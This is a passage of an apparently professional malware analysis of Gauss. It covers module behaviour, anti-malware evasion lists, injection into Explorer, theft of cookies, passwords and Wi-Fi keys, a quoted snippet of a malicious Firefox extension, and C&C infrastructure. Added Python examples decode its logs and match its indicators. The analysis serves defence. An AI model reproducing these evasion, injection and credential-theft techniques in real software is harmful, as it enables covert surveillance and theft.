    All functionality is implemented in 'RevertCache' export. The module starts its main thread and then returns. The main thread waits for the '{B336C220-B158}' event and continuously checks for the presence of anti-malware software.

    'ValidateEntry' signals the '{B336C220-B158}' event, allowing for the disk enumeration routine to start.

    Writes log file: %temp%\~mdk.tmp
    Reads registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

    Checks for running antimalware products by names and exits if they are present:

    AVKProxy.exe
    AVKService.exe
    AVKTray.exe
    AVKWCtl.exe
    GDFirewallTray.exe
    GDFwSvc.exe
    GDScan.exe
    abcd.exe
    avp.exe
    fameh32.exe
    fch32.exe
    fsar32.exe
    fsav32.exe
    fsdfwd.exe
    fsgk32.exe
    fsgk32st.exe
    fsguidll.exe
    fshdll32.exe
    fsm32.exe
    fsma32.exe
    fsmb32.exe
    fsorsp.exe
    fspc.exe
    fsqh.exe
    fssm32.exe
    fsus.exe
    gsava.exe
    gssm32.exe

    The version of the module built on 27.09.2011 also exits if started on Windows 7 SP1.

    By querying the disk enumeration key in the registry, it also tries to determine whether each storage device is USB-connected by searching for the string 'USBSTOR' in the device information.

    The log file entries are compressed with Zlib.


    Version info 'smdk.ocx' (the same as in dskapi.ocx)

    McDmn.ocx

    Name of the module used in Gauss: 'McDomain'

    File names: %system32%\mcdmn.ocx
    Known MD5: 9CA4A49135BCCDB09931CF0DBE25B5A9
    Image Size: 102 400 bytes
    Date of compilation: 16.09.2011
    Related files: %temp%\md.bak

    This module is a Windows DLL file with one exported function called 'DllRegisterServer'.

    It creates the log file %temp%\md.bak, which is encrypted with a 2-byte XOR.

    Uses LsaQueryInformationPolicy to retrieve the name of the primary domain. Retrieves information about network adapters. All this information is encrypted and stored in the log file.

    File Version:       2001.12.4414.320
    Product Version:    5.1.2600.5788
    File OS:            WINDOWS32
    File Type:          DLL
    File SubType:       UNKNOWN
    File Date:          00:00:00  00/00/0000
    Language/Code Page: 1033/1200
    CompanyName:        Microsoft Corporation
    FileDescription:    Windows File Extension
    FileVersion:        2001.12.4414.320
    LegalCopyright:     Copyright (C) Microsoft Corp. 1995-1999
    LegalTrademarks:    Microsoft(R) is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation
    ProductName:        Microsoft® Windows® Operating System
    ProductVersion:     05.01.2600.5788

    Version info 'mcdmn.ocx'

    Lanhlp32.ocx

    Name of the module used in Gauss: 'Tailor'

    File names: %system32%\lanhlp32.ocx
    Known MD5: ED2B439708F204666370337AF2A9E18F
    Image Size: 278 528 bytes
    Date of compilation: 26.10.2011
    Related files: %systemroot%\Temp\s61cs3.dat

    The module is a Windows DLL file with one exported function called 'DllRegisterServer'.

    It contains encrypted debug information that includes the location of the project, 'd:\projects\tailor\':

    d:\projects\tailor\utils\Exceptions.h ..\Utils\Buffer.cpp ..\Utils\CryptUtils.cpp ..\Utils\Event.cpp ..\Utils\EveryoneSecurityAttributes.cpp ..\Utils\File.cpp ..\Utils\Mutex.cpp ..\Utils\MyWlanApi.cpp ..\Utils\OsUtils.cpp ..\Utils\RemoteMemoryBuffer.cpp ..\Utils\Storage.cpp ..\Utils\StringUtils.cpp ..\Utils\Waiter.cpp .\SavedWNetworkConnectionsWin5.cpp .\SavedWNetworkConnectionsWin6.cpp .\VisibleNetworks.cpp

    Creates mutex : Global\EnvDBE

    Creates log file: %systemroot%\Temp\s61cs3.dat

    Operates on Windows XP, Windows Vista and Windows 7.

    On Windows XP:
    .\SavedWNetworkConnectionsWin5.cpp
    Enumerates registry keys in HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\
    Extracts 'Static#' values that contain wireless key data.

    On Windows Vista and Windows 7:
    ..\Utils\MyWlanApi.cpp
    .\SavedWNetworkConnectionsWin6.cpp
    .\VisibleNetworks.cpp

    Uses extended wlanapi.dll API to access WLAN information. Enumerates available wireless interfaces, then enumerates all profiles and extracts SSID, name and wireless key information. Then, it retrieves the list of wireless networks visible to all the wireless interfaces.

    The log file is encrypted with a simple 1-byte XOR.

    File Version:       5.1.3700.0
    Product Version:    5.1.3700.0
    File OS:            NT (WINDOWS32)
    File Type:          DRV
    File SubType:       DRV SOUND
    File Date:          00:00:00  00/00/0000
    Language/Code Page: 1033/1200
    CompanyName:        Microsoft Corporation
    FileDescription:    Microsoft Windows LAN Component
    FileVersion:        5.1.3700.0
    InternalName:       lanhlp32.ocx
    LegalCopyright:     © Microsoft Corporation. All rights reserved.
    OriginalFilename:   lanhlp32.ocx
    ProductName:        Microsoft® Windows® Operating System
    ProductVersion:     5.1.3700.0

    Version info 'lanhlp32.ocx'

    Devwiz.ocx

    Name of the module used in Gauss: 'Cosmos'

    File names: %system32%\devwiz.ocx
    Known MD5: CBB982032AED60B133225A2715D94458
    Image Size: 102 400 bytes
    Date of compilation: 19.03.2012
    Related files: %temp%\~ZM6AD3.tmp

    The module is a Windows DLL file with one exported function called 'RefreshDev'.

    It creates the log file %WINDIR%\temp\~ZM6AD3.tmp.

    The log file is not encrypted and starts with the magic number 0xF68B973D.

    The module collects the following information and writes it to the log file:

    • CMOS RAM contents
    • Registry keys :

      [ HKLM\HARDWARE\DESCRIPTION\System ]
      SystemBiosVersion, SystemBiosDate

      [ HARDWARE\DESCRIPTION\System\BIOS ]
      BIOSVendor, BIOSVersion, BIOSReleaseDate, BaseBoardManufacturer, BaseBoardProduct,
      BaseBoardVersion, SystemFamily, SystemManufacturer, SystemProductName, SystemSKU,
      SystemVersion

    All retrieved information is written to the log file.

    File Version:       5.1.2600.0
    Product Version:    5.1.2600.0
    File OS:            NT (WINDOWS32)
    File Type:          DRV
    File SubType:       DRV SOUND
    File Date:          00:00:00  00/00/0000
    Language/Code Page: 1033/1200
    CompanyName:        Microsoft Corporation
    FileDescription:    Windows Device Wizard
    FileVersion:        5.1.2600.0
    InternalName:       devwiz.ocx
    LegalCopyright:     © Microsoft Corporation. All rights reserved.
    OriginalFilename:   devwiz.ocx
    ProductName:        Microsoft® Windows® Operating System
    ProductVersion:     5.1.2600.0

    Version info 'devwiz.ocx'

    Winshell.ocx

    Name of the module used in Gauss: 'Gauss'

    File names: %system32%\winshell.ocx
    Known MD5: EF6451FDE3751F698B49C8D4975A58B5, 7AC2799B5337B4BE54E5D5B03B214572, 4FB4D2EB303160C5F419CEC2E9F57850
    Image Size: 405 504 bytes (August 2011), 417 792 bytes (October 2011), 401 408 bytes (Dec 2011 - Jan 2012)
    Number of resources: 6
    Resources: 121, 122, 123, 124, 125, 126
    Date of compilation: 08.08.2011, 03.10.2011, 14.12.2011, 05.01.2012
    Related files: %temp%\ws1bin.dat, browser.js, browser.xul, fileio.js, chrome.manifest, lppd.dat, install.rdf, rssf.dat, lfm.dat, mppd.dat, pddp.dat

    Creates events: 'Global\SrvReportCondition', 'Global\DhwSyncEvent', 'Global\ShellSync'

    Interestingly, all three variants of the module that we have analyzed contain information about the location and names of the original projects:

    Variant            Path to project files
    August 2011        d:\projects\gauss
    October 2011       d:\projects\gauss_for_macis_2
    Dec 2011-Jan 2012  c:\documents and settings\flamer\desktop\gauss_white_1

    Contains encrypted debug information that includes the location and files of the project:

    c:\documents and settings\flamer\desktop\gauss_white_1\utils\Exceptions.h .\main.cpp .\Manager.cpp c:\documents and settings\flamer\desktop\gauss_white_1\utils\SmartPtr.h .\Injector.cpp c:\documents and settings\flamer\desktop\gauss_white_1\gauss\../Utils/ComUtils.h .\History.cpp .\FirefoxPluginInstaller.cpp .\Telemetry.cpp .\Storage.cpp .\OsUtils.cpp .\ProcessSnapshot.cpp .\Event.cpp .\GaussThread.cpp .\Buffer.cpp .\RemoteMemoryBuffer.cpp .\File.cpp .\Mutex.cpp .\Waiter.cpp .\EveryoneSecurityAttributes.cpp .\Catcher.cpp .\BrowserConnector.cpp c:\documents and settings\flamer\desktop\gauss_white_1\minime\../Utils/SmartPtr.h .\Assigner.cpp .\IEAbstractElements.cpp .\FormExtractor.cpp .\COMAbstractDataTypes.cpp

    The debug information, which the developers left in by accident, provides some interesting details. For instance, the Windows username under which the project was compiled can be seen in the strings above: 'flamer'.

    DllMain starts a thread only if loaded by 'explorer.exe'.

    Writes log file: %systemroot%\Temp\ws1bin.dat. Log file starts with magic number 0x0A86FD375, encrypted with 1-byte XOR 0x46. Log file writer is guarded by mutex 'Global\ShellSyncCom'.
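The log formats described for the Gauss modules share one pattern: a fixed magic number followed by records under a short repeating XOR key (ws1bin.dat with a 1-byte key of 0x46, s61cs3.dat with a 1-byte key, md.bak with a 2-byte key). The following Python decoder is an added example written for this page; it is not Kaspersky's or Gauss's code. It assumes the key repeats across the whole file and that the magic is a 32-bit little-endian value at offset 0; the report writes the winshell.ocx magic as '0x0A86FD375', nine hex digits, which the example reads as 0xA86FD375 on the assumption that the leading zero is spurious. The sample blob is constructed, not a capture.

```python
"""Decoder for XOR-obfuscated Gauss-style log files such as ws1bin.dat.

Added example for this page, not Kaspersky's or Gauss's code. Assumptions:
  - the XOR key repeats over the whole file; the same routine covers the
    1-byte keys (ws1bin.dat, s61cs3.dat) and 2-byte keys (md.bak, or the
    0xACDC key the report lists for Gauss C2 traffic),
  - the magic number is a 32-bit little-endian value at offset 0, and the
    report's '0x0A86FD375' is read as 0xA86FD375 (leading zero assumed spurious).
"""
import struct
from itertools import cycle
from typing import Optional

WS1BIN_KEY = bytes([0x46])   # 1-byte XOR key given in the report
WS1BIN_MAGIC = 0xA86FD375    # see the assumption in the docstring


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def try_decode_log(blob: bytes, key: bytes, magic: int) -> Optional[bytes]:
    """XOR-decode a log file and verify its leading 32-bit magic number.

    Returns the payload after the magic, or None when the magic does not
    match (wrong key, truncated file, or not this module's log at all).
    """
    plain = xor_bytes(blob, key)
    if len(plain) < 4:
        return None
    (found,) = struct.unpack("<I", plain[:4])
    if found != magic:
        return None
    return plain[4:]


def recover_single_byte_key(blob: bytes, magic: int) -> Optional[int]:
    """Brute-force a 1-byte key, using the known magic as a 4-byte crib.

    Handy when a sample uses a variant key: only 256 candidates, and the
    4-byte magic makes a false match very unlikely.
    """
    if len(blob) < 4:
        return None
    target = struct.pack("<I", magic)
    for candidate in range(256):
        if bytes(b ^ candidate for b in blob[:4]) == target:
            return candidate
    return None


# Constructed sample: a plaintext record (NOT a real ws1bin.dat capture)
# encoded the way the decoder expects, so the example runs offline.
SAMPLE_PLAINTEXT = b"Computer name: WORKSTATION-01\r\n"
SAMPLE_BLOB = xor_bytes(struct.pack("<I", WS1BIN_MAGIC) + SAMPLE_PLAINTEXT,
                        WS1BIN_KEY)

if __name__ == "__main__":
    key = recover_single_byte_key(SAMPLE_BLOB, WS1BIN_MAGIC)
    print(f"recovered key: 0x{key:02X}")
    print(try_decode_log(SAMPLE_BLOB, bytes([key]), WS1BIN_MAGIC))
```

The magic check is what turns a blind XOR into a verifiable decode: a wrong key or an unrelated file fails the check instead of producing plausible-looking garbage, and the same four bytes double as a crib for recovering an unknown 1-byte key.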

    Reads registry key: SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability, value ShutdownInterval = binary data

    Checks the Windows version and, on Windows Vista and Windows 7, accesses %SystemDrive%\Users. On earlier versions, it uses %SystemDrive%\Documents and Settings and gets the list of directories there.

    Export 'InitShellEx': enumerates all entries in HKEY_USERS, removes all entries in SOFTWARE\Mozilla\Mozilla\Firefox for each user, searches for its log ws1bin.dat and removes it.

    Export 'SetWindowEvent': sets the event 'Global\DhwSyncEvent', waits up to 20 seconds for the other thread to exit, then terminates that thread.

    Export 'ShellNotifyUser': returns 1.

    Export 'ShellNotifyUserEx': the main export. It starts the main thread, which is controlled through the 'SetWindowEvent' export, and returns.

    Lists running processes and returns if 'evil.exe' is running. Additionally logs the presence of the following registry keys : 'HKLM\SOFTWARE\KasperskyLab\AVP6', 'HKLM\SOFTWARE\KasperskyLab\protected\AVP7'

    Then it starts a loop searching for running instances of %systemroot%\explorer.exe. If found, it injects %systemroot%\system32\winshell.ocx (own body) into that process.

    It uses an interesting technique to inject itself into Explorer: it creates a remote thread with the address of 'LoadLibraryW' API as its start address. The path to its ocx file is passed to the function as 'lpParameter'.

    Telemetry: It retrieves and logs the following:

    • Computer name
    • Windows OS version
    • List of running processes
    • List of directories in %PROGRAMFILES%
    • Version of Internet Explorer browser
    • Primary domain name
    • Network adapter information

    Searches for Cookies directory, retrieves all cookie files and writes their contents into its log. Searches for cookies that contain the following strings:

    paypal
    mastercard
    eurocard
    visa
    americanexpress
    bankofbeirut
    eblf
    blombank
    byblosbank
    citibank
    fransabank
    yahoo
    creditlibanais
    amazon
    facebook
    gmail
    hotmail
    ebay
    maktoob

    Then, it retrieves Internet Explorer browsing history using IUrlHistoryStg::EnumUrls function, and tries to extract password and text fields from loaded pages.

    The Firefox plugin consists of several files, all of which are extracted and decrypted from the resources of the module.

    Resource Id File name of the Firefox Plugin component
    121 browser.js
    122 browser.xul
    123 fileio.js
    124 chrome.manifest
    125 lppd.dat
    126 install.rdf

    Appends the following line to the Firefox configuration file 'prefs.js', which disables the 'select your add-ons' window that Firefox usually shows after each update:

    user_pref("extensions.shownSelectionUI", true);

    Installs the Firefox extension, on Windows Vista and Windows 7 into AppData\Roaming\Mozilla\Firefox\Profiles, on earlier versions into Application Data\Mozilla\Firefox\Profiles. All files are written in a directory named '{a288cad4-7b24-43f8-9f4d-8e156305a8bc}'.

    The Firefox extension extracts the following data:

    • Browsing history
    • Passwords (saved and entered by the user)
    • Cookies. The extension can be configured to look only for cookies of Google, Hotmail, Facebook, Yahoo

    const Cc = Components.classes;
    const Ci = Components.interfaces;
    const EXTENSION_ID = "{a288cad4-7b24-43f8-9f4d-8e156305a8bc}";
    const EXTENSION_PATH = DirIO.get("ProfD").path+"\\extensions\\"+EXTENSION_ID;
    const QUERY_ID = 'YlU/X1gFa2Isb1YkcFMnP18u`1kkb1goYFUOakAgY1ULa1EjYlU/X1gPXWMyc18xYGM0b1UxalEsYVYgX1Uha18qdVEna18lYWQi`Dgob2QubmklYWQi`DEjYGIkb2MvXWMyc18xYFwoclUl`WgPblUlb/oSY18uY1wk`FkjYT8tRV4ocFYkcFMnPVwrP18u`1kkb2gublk/';
    const EXTENSION_URL = "about:addons";
    const EXTENSION_XUL = "chrome://mozapps/content/extensions/extensions.xul";
    const ERROR_FILE = "rssf.dat";
    const LOG_FILE = "lfm.dat";
    const OUTPUT_FILE = "mppd.dat";
    const VERSION_FILE = "lddp.dat";
    const MAX_FILE_SIZE = Math.pow(2,20)*10;
    const MEAN_ROW_SIZE = 100;
    const MAX_ROW_COUNT = (1/3)*(MAX_FILE_SIZE/MEAN_ROW_SIZE);

    Part of browser.js code

    The Firefox extension writes several log files in its directory:

    Log file name Description
    rssf.dat Browsing history
    lfm.dat Log file
    mppd.dat Collected passwords
    pddp.dat Collected cookies

    File Version:       5.1.3700.0
    Product Version:    5.1.3700.0
    File OS:            NT (WINDOWS32)
    File Type:          DRV
    File SubType:       DRV SOUND
    File Date:          00:00:00  00/00/0000
    Language/Code Page: 1033/1200
    CompanyName:        Microsoft Corporation
    FileDescription:    Microsoft Windows Shell Component
    FileVersion:        5.1.3700.0
    InternalName:       winshell.ocx
    LegalCopyright:     © Microsoft Corporation. All rights reserved.
    OriginalFilename:   winshell.ocx
    ProductName:        Microsoft® Windows® Operating System
    ProductVersion:     5.1.3700.0

    Version info 'winshell.ocx'

    Windig.ocx

    Name of the module used in Gauss: 'Lagrange'

    File names: %system32%\windig.ocx
    Known MD5: DE2D0D6C340C75EB415F726338835125
    Image Size: 180 224 bytes
    Date of compilation: 15.07.2011
    Related files: Fonts\pldnrfn.ttf

    The module is a Windows DLL file with one exported function called 'GlobalDeleteAtomL'.
    The module reads the registry key that is originally created by the 'ShellHW' module:

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability
    ShutdownInterval = binary data

    If the value is not present in the registry, it writes a random value into that key.

    Then, it creates a new TrueType font file '%SystemRoot%\fonts\pldnrfn.ttf' (62 668 bytes long) from a template and using randomized data from the ShutdownInterval key. The creation time of the font file is set to the creation time of the Arial font, %SystemRoot%\fonts\ARIAL.TTF.

    Then, a custom font named 'Palida Narrow' is registered in the system font storage using the 'AddFontResourceW' API function. The module also creates a registry value:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
    Palida Narrow (TrueType)=pldnrfn.ttf

    The purpose of the addition of this font is not yet known. It appears to contain valid Western, Baltic and Turkish symbols.

    Font information from Font Viewer

    File Version:       2001.12.4414.320
    Product Version:    5.1.2600.5788
    File OS:            WINDOWS32
    File Type:          DLL
    File SubType:       UNKNOWN
    File Date:          00:00:00  00/00/0000
    Language/Code Page: 1033/1200
    CompanyName:        Microsoft Corporation
    FileDescription:    WIN32 Digital Library
    FileVersion:        2001.12.4414.320
    LegalCopyright:     Copyright (C) Microsoft Corp. 1995-1999
    LegalTrademarks:    Microsoft(R) is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation
    ProductName:        Microsoft® Windows® Operating System
    ProductVersion:     05.01.2600.5788

    Version info 'windig.ocx'

    Gauss C&C Information

    To upload data stolen from infected machines, Gauss uses a number of command-and-control servers predefined in its flexible configuration.

    Figure 1 - Gauss encrypted C&C information data

    Here's a look at the decrypted configuration data:

    Figure 2 - Gauss decrypted C&C configuration data

    In the example above, we can see the C&C domains/hosts together with the name of the script (userhome.php) on the server which is used for communication.

    Going through the multitude of Gauss samples, we identified several domains used as C&C servers:

    • *.gowin7.com
    • *.secuurity.net
    • *.datajunction.org
    • *.bestcomputeradvisor.com
    • *.dotnetadvisor.info
    • *.guest-access.net
    Wmiqry.ocx (date)   C&C domains
    01.06.2011          dotnetadvisor.info, bestcomputeradvisor.info, datajunction.org, guest-access.net
    16.07.2011          *.bestcomputeradvisro.info, *.guest-access.net
    18.07.2011          *.bestcomputeradvisor.info, *.guest-access.net
    28.09.2011          *.gowin7.com, *.secuurity.net
    20.10.2011          *.datajunction.org, *.dotnetadvisor.info
    20.10.2011          *.gowin7.com, *.secuurity.net

    Depending on the variant, '*' can be 'a', 'b', 'c' and so on. For instance, a fully qualified hostname as in the example above is 'b.gowin7.com'.

    Most samples we have use '*.gowin7.com' and '*.secuurity.net'. The domains 'gowin7.com' and 'secuurity.net' have been registered by an 'Adolph Dybevek', which is most likely a fake identity:

    owner-name: Adolph Dybevek
    owner-address: Prinsen gate 6
    owner-city: Oslo
    admin-address: Prinsen gate 6
    ICANN Registrar: UNITED-DOMAINS AG
    Created: 2012-03-15
    Expires: 2013-03-15
    Updated: 2012-03-15

    As in the case of Flame, these domain registration addresses point to existing businesses. For example, at Prinsens Gate 6 in Oslo, we find a hotel in Norway:

    Similarly, many of the fake registrations of Flame C&C domains used addresses of hotels.

    During the period of monitoring, we observed these two main domains pointing to two different servers in India and Portugal. Based on passive DNS research, we identified three other servers, located in the US which appear to have been used as C&C.

    The hosts 'gowin7.com' and 'secuurity.net' pointed to the following IP addresses:

    Date Domain IP
    28.06.2012 23:05 b.gowin7.com 109.71.45.115
    2012-06-29 07:05:28 (changed) b.gowin7.com 182.18.166.116
    28.06.2012 23:05 b.secuurity.net 109.71.45.115
    2012-06-29 07:05:29 (changed) b.secuurity.net 182.18.166.116

    On 29th of June, 2012, the two C&C domains 'gowin7.com' and 'secuurity.net' were changed from IP 109.71.45.115 to a new IP 182.18.166.116.

    Both servers were shut down around July 13th, 2012. Prior to shut down, we managed to collect important information. Both appeared to be running Debian Linux, which is consistent with the Flame C&C servers. They were listening on ports 22, 80 and 443. The SSL certificates were self-signed, once again, the same as in the case of Flame. Here's the certificate for the server in Portugal:


    If we are to believe the information in the certificate, it was generated on 17 Feb 2012.

    The server at 182.18.166.116 (India) appears to currently host two other related domains:

    • bestcomputeradvisor.com
    • dotnetadvisor.info

    Both have been registered by somebody named Gilles Renaud, probably another fake identity:

    Registrant:

    Gilles Renaud
    Neugasse 10
    Zurich, Zurich 8005
    CH

    They were previously hosted in the US, at the IPs: 173.204.235.204 and 173.204.235.196.

    We currently have seen samples which used {e,g,h}.bestcomputeradvisor.com and 'c.dotnetadvisor.info' for command-and-control. It's quite possible that other samples exist pointing to different hosts.

    The additional domains 'datajunction.org' and 'guest-access.net' can be found in some samples and are also used for C&C communications. We currently have samples which use 'c.datajunction.org' and 'd.datajunction.org', but there are probably others using 'a.*' and 'b.*'.

    Both have been registered by somebody named 'Peter Kulmann,' probably another fake identity:

    Registrant Name:Peter Kulmann
    Registrant Street1:Antala Staska 1301/19
    Registrant Street2:
    Registrant Street3:
    Registrant City:Prague
    Registrant State/Province:
    Registrant Postal Code:14000
    Registrant Country:CZ

    The address 'Antala Staska 1301/19' appears once again to be fake - pointing to a supermarket/pharmacy in Prague:

    Currently (as of August 2012), all the '*.datajunction.org' hosts point to the C&C server in India. Previously, they pointed to the server in Portugal. Just like the others, they were previously hosted in US.

    In addition to these, we identified another domain named 'dataspotlight.net' which was hosted on the same servers. The registrant is unknown and we couldn't find any samples using it, however, it is probably related to the others.

    Gauss C2 Domains Overview:

    In total, we have identified 7 domains used or related to the Gauss malware:

    Domain                   Registered by   Currently hosted  Previously hosted  Older hosted
    gowin7.com               Adolph Dybevek  India             Portugal           US
    secuurity.net            Adolph Dybevek  India             Portugal           US
    datajunction.org         Peter Kulmann   India             Portugal           US
    bestcomputeradvisor.com  Gilles Renaud   India             Portugal           US
    dotnetadvisor.info       Gilles Renaud   India             Portugal           US
    dataspotlight.net        UNKNOWN         India             Portugal           UNKNOWN
    guest-access.net         Peter Kulmann   No                No                 No

    Domain registration history:

    Domain                                       Registration date
    bestcomputeradvisor.com, dotnetadvisor.info  22 July 2011
    datajunction.org, guest-access.net           26 July 2011
    gowin7.com, secuurity.net                    15 March 2012
    dataspotlight.net                            18 April 2012

    As can be seen from the table above, four domains were created in 2011 and were used in older samples. The newer samples use 'gowin7.com' and 'secuurity.net', which were registered on March 15th, 2012.

    Known Gauss C2 server IPs:

    Server Location
    182.18.166.116 India, Hyderabad
    109.71.45.115 Portugal, Constancia
    173.204.235.204 United States, San Francisco
    173.204.235.196 United States, San Francisco
    173.204.235.201 United States, San Francisco

    Here's a comparison of the Flame and Gauss C2 infrastructure:

    Property | Flame | Gauss
    Hosting | VPS running Debian Linux | VPS running Debian Linux
    Services available | SSH, HTTP, HTTPS | SSH, HTTP, HTTPS
    SSL certificate | 'localhost.localdomain' - self signed | 'localhost.localdomain' - self signed
    Registrant info | Fake names | Fake names
    Address of registrants | Hotels, shops | Hotels, shops
    C2 traffic protocol | HTTPS | HTTPS
    C2 traffic encryption | None | XOR 0xACDC
    C2 script names | cgi-bin/counter.cgi, common/index.php | userhome.php
    Number of C2 domains | ~100 | 6
    Number of fake identities used to register domains | ~20 | 3
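The C&C details collected above (the seven domains, the single-letter subdomain scheme where '*' is 'a', 'b', 'c' and so on, the server IPs, and the userhome.php script name) are enough to build a simple retrospective indicator match over proxy logs. The following Python matcher is an added example, not part of the original report; its log format, the parse_line() function and the sample lines are constructed for the example, and a real deployment would adapt the parser to the proxy's own format. Only the domains, IPs and script name come from the report.

```python
"""Indicator matcher for the Gauss C&C infrastructure listed in the report.

Added example, not from the report. The log line format
'timestamp client host dst_ip path' and the sample lines are constructed;
the domains, subdomain scheme, server IPs and script name are the report's.
"""
import re
from typing import Dict, List, Optional

GAUSS_C2_DOMAINS = frozenset({
    "gowin7.com", "secuurity.net", "datajunction.org",
    "bestcomputeradvisor.com", "dotnetadvisor.info", "guest-access.net",
    "dataspotlight.net",
})
GAUSS_C2_IPS = frozenset({
    "182.18.166.116", "109.71.45.115",
    "173.204.235.204", "173.204.235.196", "173.204.235.201",
})
C2_SCRIPT = "userhome.php"

# Constructed log format (not a real proxy's): timestamp client host dst_ip path
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<host>\S+) (?P<dst_ip>\S+) (?P<path>\S+)$"
)


def match_c2_host(host: str) -> Optional[str]:
    """Return the matched C2 domain when host is that domain itself or a
    one-label subdomain of it (the report's 'a.', 'b.', 'c.' scheme).

    Deliberately not a substring match: 'secuurity.net.example.org' must
    not trigger, while 'b.gowin7.com' must.
    """
    host = host.lower().rstrip(".")
    if host in GAUSS_C2_DOMAINS:
        return host
    label, sep, parent = host.partition(".")
    if sep and parent in GAUSS_C2_DOMAINS and label.isalnum():
        return parent
    return None


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed-format log line into named fields."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per line that touches Gauss C2 infrastructure,
    annotated with every reason (domain, IP, script name) that fired."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line; a real tool would count these
        reasons = []
        domain = match_c2_host(rec["host"])
        if domain:
            reasons.append("c2-domain:" + domain)
        if rec["dst_ip"] in GAUSS_C2_IPS:
            reasons.append("c2-ip:" + rec["dst_ip"])
        if rec["path"].split("?")[0].endswith("/" + C2_SCRIPT):
            reasons.append("c2-script:" + C2_SCRIPT)
        if reasons:
            hits.append({**rec, "reasons": ",".join(reasons)})
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "2012-06-29T07:10:01Z 10.0.0.5 b.gowin7.com 182.18.166.116 /userhome.php",
    "2012-06-29T07:11:14Z 10.0.0.9 www.example.com 93.184.216.34 /index.html",
    "2012-06-29T07:12:40Z 10.0.0.5 c.datajunction.org 173.204.235.204 /userhome.php?id=1",
    "2012-06-29T07:13:02Z 10.0.0.7 secuurity.net.example.org 198.51.100.7 /",
    "2012-06-29T07:14:30Z 10.0.0.7 unknown.host 109.71.45.115 /",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["host"], hit["reasons"])
```

Matching the IP independently of the hostname matters here because the report shows the same servers being reused across domains over time: a connection to 109.71.45.115 under a hostname not yet in the list is still worth a look.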

    DNS Balancing

    For some of the C2's, the controllers used a technique known as DNS balancing or 'Round robin DNS' - probably to even the load. This is a common technique in the case of massive traffic to a website, suggesting that at their peak, the Gauss C2's were handling quite a lot of data.

    Here's one such example of DNS balancing:

    ;; QUESTION SECTION:
    ;DATAJUNCTION.ORG.              IN      A

    ;; ANSWER SECTION:
    DATAJUNCTION.ORG.       900     IN      A       182.18.166.116
    DATAJUNCTION.ORG.       3600    IN      A       173.204.235.204
    DATAJUNCTION.ORG.       900     IN      A       109.71.45.115

    As can be seen, the domain datajunction.org resolves to three different IPs: 182.18.166.116, 173.204.235.204 and 109.71.45.115.
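The round-robin pattern above is easy to check for mechanically. The following Python helper is an added example, not part of the report: it parses a dig-style answer section (the standard 'NAME TTL CLASS TYPE RDATA' layout), lists names that resolve to more than one address, and separately flags names whose A records carry different TTLs, since an RRset normally shares a single TTL and the mixed 900/3600 values in the report's answer are themselves a small oddity. The sample input reproduces the answer section quoted above.

```python
"""Round-robin DNS check over a dig-style answer section.

Added example, not from the report. The parser handles dig's standard
'NAME TTL CLASS TYPE RDATA' answer lines and ignores comments and the
QUESTION section. SAMPLE_DIG reproduces the answer quoted in the report.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

A_RECORD_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def parse_a_records(text: str) -> Dict[str, List[Tuple[int, str]]]:
    """Map each answered name (lower-cased, no trailing dot) to its
    (ttl, ip) A records. Lines starting with ';' are dig comments or the
    question and are skipped; non-A records are ignored."""
    records: Dict[str, List[Tuple[int, str]]] = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = A_RECORD_RE.match(line)
        if m:
            name = m["name"].lower().rstrip(".")
            records[name].append((int(m["ttl"]), m["ip"]))
    return dict(records)


def round_robin_names(records: Dict[str, List[Tuple[int, str]]]) -> Dict[str, List[str]]:
    """Names that resolve to more than one distinct address, with the
    sorted address list for each."""
    return {
        name: sorted({ip for _, ip in rrs})
        for name, rrs in records.items()
        if len({ip for _, ip in rrs}) > 1
    }


def mixed_ttl_names(records: Dict[str, List[Tuple[int, str]]]) -> List[str]:
    """Names whose A records do not share one TTL (an RRset normally does)."""
    return sorted(name for name, rrs in records.items()
                  if len({ttl for ttl, _ in rrs}) > 1)


# Answer section as quoted in the report (question line included so the
# parser's comment handling is exercised).
SAMPLE_DIG = """
;; QUESTION SECTION:
;DATAJUNCTION.ORG.              IN      A

;; ANSWER SECTION:
DATAJUNCTION.ORG.       900     IN      A       182.18.166.116
DATAJUNCTION.ORG.       3600    IN      A       173.204.235.204
DATAJUNCTION.ORG.       900     IN      A       109.71.45.115
"""

if __name__ == "__main__":
    recs = parse_a_records(SAMPLE_DIG)
    print("round robin:", round_robin_names(recs))
    print("mixed TTLs:", mixed_ttl_names(recs))
```

Feeding the same parser the output of periodic dig runs (one file per run) is enough to reconstruct the hosting moves the report describes, since each run's answer set shows which of the known servers were in rotation at that time.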

    Timeline

    We tried to put together all the date-of-creation information for the different Gauss modules, as well as those for Flame and Duqu. Since no Gauss modules created before 2011 have been found, the table below does not include earlier data for Flame and Duqu modules.


    Files list

    We have put together the names of all modules, temporary files, log files and data files used by Gauss in one way or another and that are known to us.

    Main modules Path
    wmiqry32.dll %system%\wbem
    wmihlp32.dll %system%\wbem
    dskapi.ocx %system%
    winshell.ocx %system%
    devwiz.ocx %system%
    lanhlp32.ocx %system%
    mcdmn.ocx %system%
    smdk.ocx %system%
    windig.ocx %system%
    system32.bin root folder USB drive
